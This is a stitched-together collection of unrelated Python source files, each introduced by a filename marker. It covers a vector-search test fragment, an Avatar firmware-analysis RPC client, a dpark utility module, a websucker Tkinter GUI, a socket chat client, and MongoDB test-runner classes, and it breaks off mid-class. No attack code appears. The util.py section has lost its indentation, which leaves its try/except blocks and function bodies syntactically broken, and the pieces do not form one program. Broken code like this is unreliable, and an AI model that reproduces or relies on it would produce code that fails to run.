        nq = 20
        collection_names = []
        for i in range(num):
            collection = gen_unique_str(uid + str(i))
            connect.create_collection(collection, default_fields)
            collection_names.append(collection)
            entities, ids = init_data(connect, collection)
            assert len(ids) == default_nb
            # NOTE(review): `search_param` is not defined in this method --
            # presumably a module-level default; confirm.
            query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
            connect.load_collection(collection)
            res = connect.search(collection, **query)
            assert len(res) == nq
            # NOTE(review): this inner loop reuses `i`, shadowing the
            # enclosing collection index (harmless here, but confusing).
            for i in range(nq):
                assert check_id_result(res[i], ids[i])
                assert res[i]._distances[0] < epsilon
                assert res[i]._distances[1] > epsilon
        # Clean up all collections created by this test.
        for i in range(num):
            connect.drop_collection(collection_names[i])
class TestSearchDSL(object):
    """
    ******************************************************************
    # The following cases are used to build invalid query expr
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.L0)
    def test_query_vector_only(self, connect, collection):
        """
        target: test search normal scenario
        method: search vector only
        expected: search status ok, the length of result
        """
        entities, ids = init_data(connect, collection)
        connect.load_collection(collection)
        res = connect.search(collection, **default_query)
        # NOTE(review): `nq` is not defined in this method -- presumably a
        # module-level constant matching default_query's vector count; confirm.
        assert len(res) == nq
        assert len(res[0]) == default_top_k

    @pytest.mark.tags(CaseLabel.L0)
    def test_query_empty(self, connect, collection):
        """
        method: search with empty query
        expected: error raised
        """
        query = {}
        # The empty dict is passed positionally (not **-expanded), so the
        # client receives it as the first search argument and must reject it.
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
|
avatar_protocol.py | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import object
from future import standard_library
standard_library.install_aliases()
import threading
import logging
from queue import Queue, Empty
from avatar.util.reference import Reference
from avatar.interfaces.avatar_stub.avatar_protocol_lowlevel import AvatarLowlevelProtocol
from avatar.interfaces.avatar_stub.avatar_messages import create_avatar_message
from avatar.interfaces.avatar_stub.avatar_exceptions import AvatarRemoteError
log = logging.getLogger(__name__)
ASYNCHRONOUS_MESSAGES = ["AVATAR_RPC_DTH_STATE", "AVATAR_RPC_DTH_PAGEFAULT", "AVATAR_RPC_DTH_INFO_EXCEPTION"]
RESPONSE_TIMEOUT = 10
class AvatarProtocol(object):
    """High-level RPC wrapper around an Avatar stub connection.

    Outgoing commands are queued as 4-tuples
    ``(message, expected_reply_names, condition, result_reference)`` and
    drained by a dedicated sender thread (run_send), which also pairs each
    command with its synchronous reply.  Asynchronous device-to-host
    messages (see ASYNCHRONOUS_MESSAGES) are dispatched separately via
    handle_asynchronous_message.
    """

    # Seconds to wait when establishing the connection.
    CONNECT_TIMEOUT = 10

    def __init__(self, sock, paging_handler = lambda x: None):
        """Wrap `sock` with the low-level protocol and start the sender thread.

        @param sock: connected socket handed to AvatarLowlevelProtocol.
        @param paging_handler: callback invoked for *every* asynchronous
            message (despite the name, not only pagefaults).
        """
        #TODO: Put a meaningful timeout
        self._socket = sock
        # Low-level framing layer; delivers inbound messages to our handler.
        self._protocol = AvatarLowlevelProtocol(self._socket, self._handle_received_message)
        self._terminate = threading.Event()
        self._state = None
        self._asynchronous_messages_handler = paging_handler
        self._queued_commands = Queue()
        self._received_synchronous_messages = Queue()
        self._send_thread = threading.Thread(target = self.run_send)
        # Serializes writes on the low-level protocol between the sender
        # thread and the pagefault path in handle_asynchronous_message.
        self._send_lock = threading.Lock()
        self._send_thread.start()

    def _handle_received_message(self, msg):
        """Route an inbound message: async notification vs. RPC reply."""
        if msg.name in ASYNCHRONOUS_MESSAGES:
            self.handle_asynchronous_message(msg)
        else:
            self._received_synchronous_messages.put(msg)

    def run_send(self):
        """Sender-thread main loop.

        Transmits queued commands and, when a reply is expected, waits for
        the matching synchronous message and wakes the blocked caller via
        the command's condition variable / result reference.
        """
        while not self._terminate.is_set():
            result = None
            try:
                # 1s timeout so the loop can observe _terminate regularly.
                result = self._queued_commands.get(timeout = 1)
            except Empty:
                continue
            if not result:
                continue
            self._send_lock.acquire()
            self._protocol.send_message(result[0])
            self._send_lock.release()
            if result[1]:
                log.debug("Waiting for response to message %s", result[0].name)
                # NOTE(review): if no reply arrives within RESPONSE_TIMEOUT,
                # Queue.Empty propagates and kills this thread -- confirm
                # whether that is intended.
                recv_msg = self._received_synchronous_messages.get(timeout = RESPONSE_TIMEOUT)
                if recv_msg and recv_msg.name in result[1]:
                    if result[2]:
                        result[2].acquire()
                        if result[3]:
                            result[3].set_value(recv_msg)
                        result[2].notify()
                        result[2].release()
                else:
                    # NOTE(review): the waiting caller is never woken up in
                    # this branch -- confirm whether that is intended.
                    log.warn("Unexpected message received: %s", recv_msg.name)

    def handle_asynchronous_message(self, msg):
        """Process device-initiated messages (pagefault, state, exception).

        NOTE(review): _page_fault_handler, insert_page and
        _exception_handler are not defined in this class -- presumably
        supplied by a subclass or assigned externally; confirm.
        """
        if msg.name == "AVATAR_RPC_DTH_PAGEFAULT":
            page_data = self._page_fault_handler(msg.page_address)
            self.insert_page(msg.page_address, page_data)
            self._send_lock.acquire()
            self._protocol.send_message(create_avatar_message("AVATAR_RPC_HTD_CONTINUE_FROM_PAGEFAULT", {}))
            self._send_lock.release()
        elif msg.name == "AVATAR_RPC_DTH_STATE":
            self._state = msg.state
        elif msg.name == "AVATAR_RPC_DTH_INFO_EXCEPTION":
            self._exception_handler(msg.exception)
        # Every asynchronous message is also forwarded to the user handler.
        self._asynchronous_messages_handler(msg)

    def set_register(self, register, value):
        """Synchronously set a device register.

        The condition variable is acquired *before* the command is queued,
        so the sender thread cannot notify before we wait (no lost wakeup).
        NOTE(review): unlike the other RPCs, an error reply is not turned
        into AvatarRemoteError here -- confirm whether intentional.
        """
        msg = create_avatar_message("AVATAR_RPC_HTD_SET_REGISTER", {"register": register, "value": value})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()

    def get_register(self, register):
        """Synchronously read a device register; raises AvatarRemoteError on failure."""
        msg = create_avatar_message("AVATAR_RPC_HTD_GET_REGISTER", {"register": register})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_GET_REGISTER", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)
        return ref.get_value().value

    def read_memory(self, address, size):
        """Synchronously read typed memory; raises AvatarRemoteError on failure."""
        msg = create_avatar_message("AVATAR_RPC_HTD_READ_MEMORY", {"address": address, "size": size})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_READ_MEMORY", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)
        return ref.get_value().value

    def write_memory(self, address, size, value):
        """Synchronously write typed memory; raises AvatarRemoteError on failure."""
        msg = create_avatar_message("AVATAR_RPC_HTD_WRITE_MEMORY", {"address": address, "size": size, "value": value})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)

    def read_memory_untyped(self, address, size):
        """Synchronously read up to 255 raw bytes; raises AvatarRemoteError on failure."""
        assert(size <= 255)
        msg = create_avatar_message("AVATAR_RPC_HTD_READ_UNTYPED_MEMORY", {"address": address, "size": size})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_READ_UNTYPED_MEMORY", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)
        return ref.get_value().data

    def write_memory_untyped(self, address, data):
        """Synchronously write up to 255 raw bytes; raises AvatarRemoteError on failure."""
        assert(len(data) <= 255)
        assert(isinstance(data, bytes))
        msg = create_avatar_message("AVATAR_RPC_HTD_WRITE_UNTYPED_MEMORY", {"address": address, "data": data})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)

    def execute_codelet(self, address):
        """Run a codelet on the device and wait for it to finish."""
        msg = create_avatar_message("AVATAR_RPC_HTD_CODELET_EXECUTE", {"address": address})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_CODELET_EXECUTION_FINISHED", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)

    def cont(self):
        """Resume execution of the remote VM."""
        msg = create_avatar_message("AVATAR_RPC_HTD_RESUME_VM", {})
        expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
        cv = threading.Condition()
        ref = Reference()
        cv.acquire()
        self._queued_commands.put((msg, expected_replies, cv, ref))
        cv.wait()
        cv.release()
        if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
            raise AvatarRemoteError(ref.get_value().error)

    def stop(self):
        """Shut down the sender thread and the low-level protocol."""
        self._terminate.set()
        self._protocol.stop()
|
util.py | # util
import types
from zlib import compress as _compress, decompress
import threading
import warnings
try:
from dpark.portable_hash import portable_hash as _hash
except ImportError:
import pyximport
pyximport.install(inplace=True)
from dpark.portable_hash import portable_hash as _hash
COMPRESS = 'zlib'
def compress(s):
return _compress(s, 1)
try:
    # Prefer lz4 (fastest); this rebinds both compress and decompress,
    # shadowing the zlib-based definitions above.
    from lz4 import compress, decompress
    COMPRESS = 'lz4'
except ImportError:
    try:
        # Fall back to snappy before settling for zlib.
        from snappy import compress, decompress
        COMPRESS = 'snappy'
    except ImportError:
        # Keep the zlib-based compress/decompress defined above.
        pass
def spawn(target, *args, **kw):
    """Start *target* in a daemon thread (named after the callable) and
    return the running Thread object."""
    worker = threading.Thread(
        target=target, name=target.__name__, args=args, kwargs=kw)
    worker.daemon = True
    worker.start()
    return worker
# hash(None) is id(None), which differs between machines/processes
# http://effbot.org/zone/python-hash.htm
def portable_hash(value):
    """Return a hash stable across processes and machines (unlike the
    builtin ``hash``), delegating to the compiled dpark helper."""
    return _hash(value)
# similar to itertools.chain.from_iterable, but faster in PyPy
def chain(it):
    """Lazily flatten one level of nesting from *it*."""
    for inner in it:
        for item in inner:
            yield item
def izip(*its):
    """Yield tuples pairing the next element of each iterable, stopping at
    the shortest input (like the builtin ``zip``).

    Fixed: the original called the Python-2-only ``it.next()`` method,
    which raises AttributeError on Python 3; the builtin ``next(it)``
    works on Python 2.6+ and Python 3 alike.  The StopIteration raised
    when any input is exhausted is caught here, so the generator simply
    finishes (also safe under PEP 479).
    """
    its = [iter(it) for it in its]
    try:
        while True:
            yield tuple([next(it) for it in its])
    except StopIteration:
        pass
|
wsgui.py | #! /usr/bin/env python
"""Tkinter-based GUI for websucker.
Easy use: type or paste source URL and destination directory in
their respective text boxes, click GO or hit return, and presto.
"""
from Tkinter import *
import websucker
import os
import threading
import Queue
import time
VERBOSE = 2
try:
    class Canceled(Exception):
        "Exception used to cancel run()."
except (NameError, TypeError):
    # Fallback for ancient Python versions without class-based exceptions:
    # use a module-qualified string exception instead.
    Canceled = __name__ + ".Canceled"
class SuckerThread(websucker.Sucker):
    """websucker.Sucker subclass that reports progress through a queue and
    can be cancelled cooperatively from the GUI thread via `stopit`."""

    # Set to 1 by the GUI to request cancellation; checked in savefile/getpage.
    stopit = 0
    # Optional directory that downloaded files are remapped into.
    savedir = None
    # Prefix stripped from computed paths before remapping under savedir.
    rootdir = None

    def __init__(self, msgq):
        """Store the GUI message queue and configure the base Sucker."""
        self.msgq = msgq
        websucker.Sucker.__init__(self)
        self.setflags(verbose=VERBOSE)
        self.urlopener.addheaders = [
            ('User-agent', 'websucker/%s' % websucker.__version__),
        ]

    def message(self, format, *args):
        """Forward a status message to the GUI via the queue."""
        if args:
            format = format%args
        ##print format
        self.msgq.put(format)

    def run1(self, url):
        """Download starting at `url`; always signal completion with None."""
        try:
            try:
                self.reset()
                self.addroot(url)
                self.run()
            except Canceled:
                self.message("[canceled]")
            else:
                self.message("[done]")
        finally:
            # None on the queue tells the GUI this run is finished.
            self.msgq.put(None)

    def savefile(self, text, path):
        """Save a file, aborting with Canceled if a stop was requested."""
        if self.stopit:
            raise Canceled
        websucker.Sucker.savefile(self, text, path)

    def getpage(self, url):
        """Fetch a page, aborting with Canceled if a stop was requested."""
        if self.stopit:
            raise Canceled
        return websucker.Sucker.getpage(self, url)

    def savefilename(self, url):
        """Compute the save path, remapped under `savedir` when set."""
        path = websucker.Sucker.savefilename(self, url)
        if self.savedir:
            n = len(self.rootdir)
            if path[:n] == self.rootdir:
                path = path[n:]
                while path[:1] == os.sep:
                    path = path[1:]
                path = os.path.join(self.savedir, path)
        return path

    def XXXaddrobot(self, *args):
        # Disabled robots.txt handling (kept under XXX names).
        pass

    def XXXisallowed(self, *args):
        return 1
class App:
    """One websucker control panel: URL/directory entries plus Go, Cancel
    and Paste+Go buttons, laid out in the given Tk container."""

    # Created lazily on first go(); each App owns one SuckerThread and queue.
    sucker = None
    msgq = None

    def __init__(self, top):
        """Build the widget grid inside `top`."""
        self.top = top
        top.columnconfigure(99, weight=1)
        self.url_label = Label(top, text="URL:")
        self.url_label.grid(row=0, column=0, sticky='e')
        self.url_entry = Entry(top, width=60, exportselection=0)
        self.url_entry.grid(row=0, column=1, sticky='we',
                            columnspan=99)
        self.url_entry.focus_set()
        self.url_entry.bind("<Key-Return>", self.go)
        self.dir_label = Label(top, text="Directory:")
        self.dir_label.grid(row=1, column=0, sticky='e')
        self.dir_entry = Entry(top)
        self.dir_entry.grid(row=1, column=1, sticky='we',
                            columnspan=99)
        self.go_button = Button(top, text="Go", command=self.go)
        self.go_button.grid(row=2, column=1, sticky='w')
        self.cancel_button = Button(top, text="Cancel",
                                    command=self.cancel,
                                    state=DISABLED)
        self.cancel_button.grid(row=2, column=2, sticky='w')
        self.auto_button = Button(top, text="Paste+Go",
                                  command=self.auto)
        self.auto_button.grid(row=2, column=3, sticky='w')
        self.status_label = Label(top, text="[idle]")
        self.status_label.grid(row=2, column=4, sticky='w')
        self.top.update_idletasks()
        self.top.grid_propagate(0)

    def message(self, text, *args):
        """Show a (possibly %-formatted) status message in the label."""
        if args:
            text = text % args
        self.status_label.config(text=text)

    def check_msgq(self):
        """Poll the worker's queue every 100ms; None marks run completion."""
        while not self.msgq.empty():
            msg = self.msgq.get()
            if msg is None:
                # Run finished: re-enable the controls.
                self.go_button.configure(state=NORMAL)
                self.auto_button.configure(state=NORMAL)
                self.cancel_button.configure(state=DISABLED)
                if self.sucker:
                    self.sucker.stopit = 0
                self.top.bell()
            else:
                self.message(msg)
        self.top.after(100, self.check_msgq)

    def go(self, event=None):
        """Validate the URL entry and start a download thread."""
        if not self.msgq:
            self.msgq = Queue.Queue(0)
            self.check_msgq()
        if not self.sucker:
            self.sucker = SuckerThread(self.msgq)
        if self.sucker.stopit:
            # A cancel is still in progress; ignore the request.
            return
        self.url_entry.selection_range(0, END)
        url = self.url_entry.get()
        url = url.strip()
        if not url:
            self.top.bell()
            self.message("[Error: No URL entered]")
            return
        self.rooturl = url
        dir = self.dir_entry.get().strip()
        if not dir:
            self.sucker.savedir = None
        else:
            self.sucker.savedir = dir
            self.sucker.rootdir = os.path.dirname(
                websucker.Sucker.savefilename(self.sucker, url))
        self.go_button.configure(state=DISABLED)
        self.auto_button.configure(state=DISABLED)
        self.cancel_button.configure(state=NORMAL)
        self.message( '[running...]')
        self.sucker.stopit = 0
        t = threading.Thread(target=self.sucker.run1, args=(url,))
        t.start()

    def cancel(self):
        """Request cooperative cancellation of the running download."""
        if self.sucker:
            self.sucker.stopit = 1
        self.message("[canceling...]")

    def auto(self):
        """Paste the X selection/clipboard into the URL entry and go."""
        tries = ['PRIMARY', 'CLIPBOARD']
        text = ""
        for t in tries:
            try:
                text = self.top.selection_get(selection=t)
            except TclError:
                continue
            text = text.strip()
            if text:
                break
        if not text:
            self.top.bell()
            self.message("[Error: clipboard is empty]")
            return
        self.url_entry.delete(0, END)
        self.url_entry.insert(0, text)
        self.go()
class AppArray:
    """Top-level window holding a stack of App panels plus New/Exit buttons."""

    def __init__(self, top=None):
        """Create (or adopt) the root window and add the first panel."""
        if not top:
            top = Tk()
        top.title("websucker GUI")
        top.iconname("wsgui")
        top.wm_protocol('WM_DELETE_WINDOW', self.exit)
        self.top = top
        self.appframe = Frame(self.top)
        self.appframe.pack(fill='both')
        self.applist = []
        self.exit_button = Button(top, text="Exit", command=self.exit)
        self.exit_button.pack(side=RIGHT)
        self.new_button = Button(top, text="New", command=self.addsucker)
        self.new_button.pack(side=LEFT)
        self.addsucker()
        ##self.applist[0].url_entry.insert(END, "http://www.python.org/doc/essays/")

    def addsucker(self):
        """Append another App panel to the window."""
        self.top.geometry("")
        frame = Frame(self.appframe, borderwidth=2, relief=GROOVE)
        frame.pack(fill='x')
        app = App(frame)
        self.applist.append(app)

    # Class-level flag flipped by exit() to end the custom main loop.
    done = 0

    def mainloop(self):
        """Hand-rolled event loop: poll Tk at ~10 Hz until exit() is called."""
        while not self.done:
            time.sleep(0.1)
            self.top.update()

    def exit(self):
        """Cancel all running downloads and stop the main loop."""
        for app in self.applist:
            app.cancel()
            app.message("[exiting...]")
        self.done = 1
def main():
    """Build the websucker GUI and run its polling main loop."""
    gui = AppArray()
    gui.mainloop()
if __name__ == '__main__':
main()
|
Client.py | import socket
from typing import Optional, Union
import threading
import logging
from data import Message, MessageListener, CloseListener
logger = logging.getLogger('CA-Client')
class Client:
    """Threaded chat client speaking length-prefixed (4-byte big-endian
    size header) JSON messages over TCP."""

    _socket: socket.socket
    _host: str = '127.0.0.1'
    _port: int = 20307
    _running: bool = False
    _messageCallback: MessageListener
    # BUGFIX: the no-op default must be wrapped in staticmethod().  A bare
    # function stored as a class attribute becomes a bound method on
    # instance access, so ``self._closeCallback()`` would pass ``self`` to
    # the zero-argument lambda and raise TypeError whenever no close
    # listener had been registered.
    _closeCallback: CloseListener = staticmethod(lambda: None)
    _rcvThread: Optional[threading.Thread] = None
    _calledOnClose: bool = False
    # When True, socket errors inside the receive loop are swallowed and
    # the loop keeps running.
    ignoreErrors: bool = True

    def SetAddress(self, host: str, port: Union[int, str] = 20307) -> None:
        """Switch to a new server, tearing down any existing connection."""
        logger.info(f'changing server to {host}:{port}!')
        self._host = host
        self._port = int(port)
        self._running = False
        if self._rcvThread:
            logger.info('stopping current connection...')
            self._socket.close()
            self._rcvThread.join()
        self._socket = socket.create_connection( (self._host, self._port) )
        self._run()
        logger.info('new connection created!')

    def SetUsername(self, uname: str) -> None:
        """Ask the server to change this client's display name."""
        logger.info(f'changing username to {uname}')
        self.Send( Message( 'system', f':CHGUNAME:{uname}' ) )

    def GetAddress(self) -> str:
        """Return the configured server address as 'host:port'."""
        return f'{self._host}:{self._port}'

    def SetMessageListener( self, func: MessageListener) -> None:
        """Register the callback invoked for every received Message."""
        self._messageCallback = func

    def SetCloseListener( self, func: CloseListener) -> None:
        """Register the callback invoked once when the connection closes."""
        self._closeCallback = func

    def Send( self, msg: Message ) -> None:
        """Serialize *msg* to JSON and send it with a 4-byte size header.

        NOTE(review): socket.send() may write only part of the buffer;
        consider sendall() -- confirm against the server framing.
        """
        if self._running:
            msgRaw: bytes = msg.toJson().encode()
            header = int.to_bytes( len(msgRaw), 4, 'big')
            self._socket.send(header)
            self._socket.send(msgRaw)

    def Stop(self) -> None:
        """Stop the receive thread, close the socket and fire the close listener."""
        if self._running:
            assert self._rcvThread is not None, 'Why tf is rcvThread None??'
            self._running = False
            self._socket.close()
            self._rcvThread.join()
            self._rcvThread = None  # type: ignore
            self._onClose()

    def _onClose( self ) -> None:
        """Invoke the close listener exactly once per connection."""
        if not self._calledOnClose:
            self._closeCallback()
            self._calledOnClose = True

    def _run(self) -> None:
        """Start the background receive thread for the current socket."""
        self._running = True
        self._calledOnClose = False
        self._rcvThread = threading.Thread(target=self._rcv )
        self._rcvThread.start()

    def _rcv(self) -> None:
        """Receive loop: read a 4-byte size header, then the JSON payload,
        and hand the decoded Message to the registered listener."""
        while self._running:
            # noinspection PyBroadException
            try:
                raw_size = self._socket.recv(4)
            except Exception:
                if self.ignoreErrors:
                    continue
                elif self._running:
                    self._running = False
                    self._onClose()
                    raise
                else:
                    return
            size = int.from_bytes(raw_size, 'big')
            if size == 0:
                continue
            logger.info(f'incoming message size: {size}')
            self._messageCallback(
                Message.fromJson(
                    self._socket.recv(size).decode()  # decode() will from UTF-8 if no argument is given
                )
            )

    def __del__(self) -> None:
        self.Stop()

    def __enter__(self) -> 'Client':
        return self

    def __exit__(self, exc_type, exc_val, exc_tb) -> None:
        self.Stop()

    @staticmethod
    def CheckIsValid( host: str, port: Union[int, str] ) -> bool:
        """Return True when host/port resolve to a usable TCP address."""
        try:
            socket.getaddrinfo( host, port, 0, socket.SOCK_STREAM )
            return True
        except socket.gaierror:
            return False
|
testcases.py | """
Subclasses of unittest.TestCase.
"""
from __future__ import absolute_import
import os
import os.path
import shutil
import threading
import unittest
from .. import config
from .. import core
from .. import logging
from .. import utils
def make_test_case(test_kind, *args, **kwargs):
    """
    Instantiate the TestCase subclass registered for `test_kind`,
    forwarding any extra arguments to its constructor.
    """
    if test_kind in _TEST_CASES:
        return _TEST_CASES[test_kind](*args, **kwargs)
    raise ValueError("Unknown test kind '%s'" % (test_kind))
class TestCase(unittest.TestCase):
    """
    A test case to execute.
    """

    def __init__(self, logger, test_kind, test_name):
        """
        Initializes the TestCase with the name of the test.
        """
        unittest.TestCase.__init__(self, methodName="run_test")
        if not isinstance(logger, logging.Logger):
            raise TypeError("logger must be a Logger instance")
        # NOTE: basestring is Python-2 only; this module targets Python 2.
        if not isinstance(test_kind, basestring):
            raise TypeError("test_kind must be a string")
        if not isinstance(test_name, basestring):
            raise TypeError("test_name must be a string")
        self.logger = logger
        self.test_kind = test_kind
        self.test_name = test_name
        # Populated by configure() / _execute() respectively.
        self.fixture = None
        self.return_code = None
        self.is_configured = False

    def long_name(self):
        """
        Returns the path to the test, relative to the current working directory.
        """
        return os.path.relpath(self.test_name)

    def basename(self):
        """
        Returns the basename of the test.
        """
        return os.path.basename(self.test_name)

    def short_name(self):
        """
        Returns the basename of the test without the file extension.
        """
        return os.path.splitext(self.basename())[0]

    def id(self):
        # Override unittest's default id() with the test's name/path.
        return self.test_name

    def shortDescription(self):
        return "%s %s" % (self.test_kind, self.test_name)

    def configure(self, fixture, *args, **kwargs):
        """
        Stores 'fixture' as an attribute for later use during execution.
        """
        # Guard against double configuration of the same test case.
        if self.is_configured:
            raise RuntimeError("configure can only be called once")
        self.is_configured = True
        self.fixture = fixture

    def run_test(self):
        """
        Runs the specified test.
        """
        raise NotImplementedError("run_test must be implemented by TestCase subclasses")

    def as_command(self):
        """
        Returns the command invocation used to run the test.
        """
        return self._make_process().as_command()

    def _execute(self, process):
        """
        Runs the specified process, recording its exit status in
        self.return_code and failing the test on a non-zero status.
        """
        if config.INTERNAL_EXECUTOR_NAME is not None:
            self.logger.info("Starting %s under executor %s...\n%s",
                             self.shortDescription(),
                             config.INTERNAL_EXECUTOR_NAME,
                             process.as_command())
        else:
            self.logger.info("Starting %s...\n%s", self.shortDescription(), process.as_command())
        process.start()
        self.logger.info("%s started with pid %s.", self.shortDescription(), process.pid)
        self.return_code = process.wait()
        if self.return_code != 0:
            raise self.failureException("%s failed" % (self.shortDescription()))
        self.logger.info("%s finished.", self.shortDescription())

    def _make_process(self):
        """
        Returns a new Process instance that could be used to run the
        test or log the command.
        """
        raise NotImplementedError("_make_process must be implemented by TestCase subclasses")
class CPPUnitTestCase(TestCase):
    """
    A C++ unit test to execute.
    """

    def __init__(self,
                 logger,
                 program_executable,
                 program_options=None):
        """
        Initializes the CPPUnitTestCase with the executable to run.
        """
        TestCase.__init__(self, logger, "Program", program_executable)
        self.program_executable = program_executable
        self.program_options = utils.default_if_none(program_options, {}).copy()

    def run_test(self):
        """Execute the unit-test binary, logging any unexpected error."""
        try:
            self._execute(self._make_process())
        except self.failureException:
            raise
        except:
            self.logger.exception("Encountered an error running C++ unit test %s.", self.basename())
            raise

    def _make_process(self):
        """Build the Process wrapping the unit-test executable."""
        return core.process.Process(
            self.logger, [self.program_executable], **self.program_options)
class CPPIntegrationTestCase(TestCase):
    """
    A C++ integration test to execute.
    """

    def __init__(self,
                 logger,
                 program_executable,
                 program_options=None):
        """
        Initializes the CPPIntegrationTestCase with the executable to run.
        """
        TestCase.__init__(self, logger, "Program", program_executable)
        self.program_executable = program_executable
        self.program_options = utils.default_if_none(program_options, {}).copy()

    def configure(self, fixture, *args, **kwargs):
        """
        Stores the fixture and points the program at the fixture's server.
        """
        TestCase.configure(self, fixture, *args, **kwargs)
        self.program_options["connectionString"] = self.fixture.get_connection_string()

    def run_test(self):
        """
        Runs the integration test program; raises on a non-zero exit.
        """
        try:
            program = self._make_process()
            self._execute(program)
        except self.failureException:
            raise
        except Exception:
            # Narrowed from a bare `except:` (E722); still re-raised.
            self.logger.exception("Encountered an error running C++ integration test %s.",
                                  self.basename())
            raise

    def _make_process(self):
        """
        Returns the Process used to run the integration test executable.
        """
        return core.programs.generic_program(self.logger,
                                             [self.program_executable],
                                             **self.program_options)
class DBTestCase(TestCase):
    """
    A dbtest to execute.
    """

    def __init__(self,
                 logger,
                 dbtest_suite,
                 dbtest_executable=None,
                 dbtest_options=None):
        """
        Initializes the DBTestCase with the dbtest suite to run.
        """
        TestCase.__init__(self, logger, "DBTest", dbtest_suite)
        # Command line options override the YAML configuration.
        self.dbtest_executable = utils.default_if_none(config.DBTEST_EXECUTABLE, dbtest_executable)
        self.dbtest_suite = dbtest_suite
        self.dbtest_options = utils.default_if_none(dbtest_options, {}).copy()

    def configure(self, fixture, *args, **kwargs):
        """
        Prepares a fresh, per-job dbpath directory for the run.
        """
        TestCase.configure(self, fixture, *args, **kwargs)
        # If a dbpath was specified, then use it as a container for all other dbpaths.
        dbpath_prefix = self.dbtest_options.pop("dbpath", DBTestCase._get_dbpath_prefix())
        dbpath = os.path.join(dbpath_prefix, "job%d" % (self.fixture.job_num), "unittest")
        self.dbtest_options["dbpath"] = dbpath
        # Wipe any leftovers from a previous run before recreating the dir.
        shutil.rmtree(dbpath, ignore_errors=True)
        try:
            os.makedirs(dbpath)
        except os.error:
            # Directory already exists.
            pass

    def run_test(self):
        """
        Runs the dbtest suite; raises failureException on a non-zero exit.
        """
        try:
            dbtest = self._make_process()
            self._execute(dbtest)
        except self.failureException:
            raise
        except Exception:
            # Narrowed from a bare `except:` (E722); still re-raised.
            self.logger.exception("Encountered an error running dbtest suite %s.", self.basename())
            raise

    def _make_process(self):
        """
        Returns the dbtest Process configured for this suite.
        """
        return core.programs.dbtest_program(self.logger,
                                            executable=self.dbtest_executable,
                                            suites=[self.dbtest_suite],
                                            **self.dbtest_options)

    @staticmethod
    def _get_dbpath_prefix():
        """
        Returns the prefix of the dbpath to use for the dbtest
        executable.

        Order of preference:
          1. The --dbpathPrefix specified at the command line.
          2. Value of the TMPDIR environment variable.
          3. Value of the TEMP environment variable.
          4. Value of the TMP environment variable.
          5. The /tmp directory.
        """
        if config.DBPATH_PREFIX is not None:
            return config.DBPATH_PREFIX
        for env_var in ("TMPDIR", "TEMP", "TMP"):
            if env_var in os.environ:
                return os.environ[env_var]
        return os.path.normpath("/tmp")
class JSTestCase(TestCase):
    """
    A jstest to execute.
    """

    # A wrapper for the thread class that lets us propagate exceptions.
    class ExceptionThread(threading.Thread):
        def __init__(self, my_target, my_args):
            threading.Thread.__init__(self, target=my_target, args=my_args)
            # Exception raised by the target, or None on success.
            self.err = None

        def run(self):
            try:
                threading.Thread.run(self)
            except Exception as err:
                # BUG FIX: the original wrote `except Exception as self.err`,
                # which is a SyntaxError on Python 3 (the target must be a
                # plain identifier). Bind locally, store, then re-raise so
                # the spawning thread can surface it via _get_exception().
                self.err = err
                raise
            else:
                self.err = None

        def _get_exception(self):
            """Returns the stored exception, or None if the target succeeded."""
            return self.err

    DEFAULT_CLIENT_NUM = 1

    def __init__(self,
                 logger,
                 js_filename,
                 shell_executable=None,
                 shell_options=None,
                 test_kind="JSTest"):
        "Initializes the JSTestCase with the JS file to run."
        TestCase.__init__(self, logger, test_kind, js_filename)
        # Command line options override the YAML configuration.
        self.shell_executable = utils.default_if_none(config.MONGO_EXECUTABLE, shell_executable)
        self.js_filename = js_filename
        self.shell_options = utils.default_if_none(shell_options, {}).copy()
        self.num_clients = JSTestCase.DEFAULT_CLIENT_NUM

